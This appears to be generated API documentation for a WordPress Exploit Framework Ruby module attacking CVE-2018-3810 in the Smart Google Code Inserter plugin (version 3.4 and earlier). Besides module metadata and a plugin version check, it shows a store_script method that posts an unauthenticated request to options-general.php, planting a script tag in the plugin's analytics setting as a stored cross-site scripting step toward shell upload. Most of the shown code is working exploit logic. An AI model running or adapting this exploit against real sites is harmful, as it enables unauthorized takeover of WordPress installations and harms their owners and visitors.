class Wpxf::Exploit::SmartGoogleCodeInserterXssShellUpload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::StoredXss::new
# File lib/wpxf/modules/exploit/xss/stored/smart_google_code_inserter_xss_shell_upload.rb, line 6 def initialize super update_info( name: 'Smart Google Code Inserter <= 3.4 Unauthenticated Stored XSS Shell Upload', author: [ 'Benjamin Lim', # Disclosure 'rastating' # WPXF module ], references: [ ['CVE', '2018-3810'], ['WPVDB', '8987'] ], date: 'Jan 01 2018' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/smart_google_code_inserter_xss_shell_upload.rb, line 23 def check check_plugin_version_from_readme('smart-google-code-inserter', '3.5') end
store_script()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/smart_google_code_inserter_xss_shell_upload.rb, line 27 def store_script execute_post_request( url: normalize_uri(wordpress_url_admin, 'options-general.php'), params: { 'page' => 'smartcode' }, body: { 'sgcgoogleanalytic' => "<script>#{xss_include_script}</script>", 'sgcwebtools' => '', 'button' => 'Save Changes', 'action' => 'savegooglecode' } ) end